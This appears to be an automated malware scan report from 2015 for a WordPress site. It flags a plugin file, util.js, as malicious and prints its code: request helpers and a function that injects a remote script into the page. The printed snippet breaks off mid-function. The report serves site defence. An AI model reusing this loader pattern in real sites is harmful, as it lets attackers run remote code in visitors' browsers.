Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=scottishcouncilfoundation.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.scottishcouncilfoundation.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 20:43:33 GMT Location: http://scottishcouncilfoundation.org/ Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://scottishcouncilfoundation.org/xmlrpc.php X-Powered-By: PHP/5.3.17 | clean |
http://scottishcouncilfoundation.org/ | 200 OK Content-Length: 43556 Content-Type: text/html | clean |
http://scottishcouncilfoundation.org/wp-content/plugins/fudou/js/jquery.flatheights.js | 200 OK Content-Length: 3694 Content-Type: application/javascript | clean |
http://scottishcouncilfoundation.org/wp-content/plugins/fudou/js/util.js | 200 OK Content-Length: 2179 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function createXmlHttpRequest() {
    try {
        if (typeof ActiveXObject != 'undefined') {
            return new ActiveXObject('Microsoft.XMLHTTP');
        } else if (window["XMLHttpRequest"]) {
            return new XMLHttpRequest();
        }
    } catch (e) {
        changeStatus(e);
    }
    return null;
};
function downloadUrl(url, callback) {
    var status = -1;
    var request = createXmlHttpRequest();
    if (!request) {
        return false;
    }
    request.onreadystate
        var doc = new ActiveXObject('Microsoft.XMLDOM');
        doc.loadXML(str);
        return doc;
    }
    if (typeof DOMParser != 'undefined') {
        return (new DOMParser()).parseFromString(str, 'text/xml');
    }
    return createElement('div', null);
}
function downloadScript(url) {
    var script = document.createElement('script');
    script.src = url;
    document.body.appendChild(script);
}
Antivirus reports:
http://scottishcouncilfoundation.org/wp-content/plugins/fudou/js/jsearch.js | 200 OK Content-Length: 11718 Content-Type: application/javascript | clean |
http://scottishcouncilfoundation.org/wp-content/themes/crrb/js/navigation.js?ver=1.0 | 200 OK Content-Length: 895 Content-Type: application/javascript | clean |
http://www.scottishcouncilfoundation.org/tel:03-4455-9266 | 404 Not Found Content-Length: 333 Content-Type: text/html | clean |
http://www.scottishcouncilfoundation.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: scottishcouncilfoundation.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 20:43:34 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: http://scottishcouncilfoundation.org/xmlrpc.php
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: scottishcouncilfoundation.org
Referer: http://www.google.com/search?q=scottishcouncilfoundation.org
Result:
The result is similar to the first query. There are no suspicious redirects found.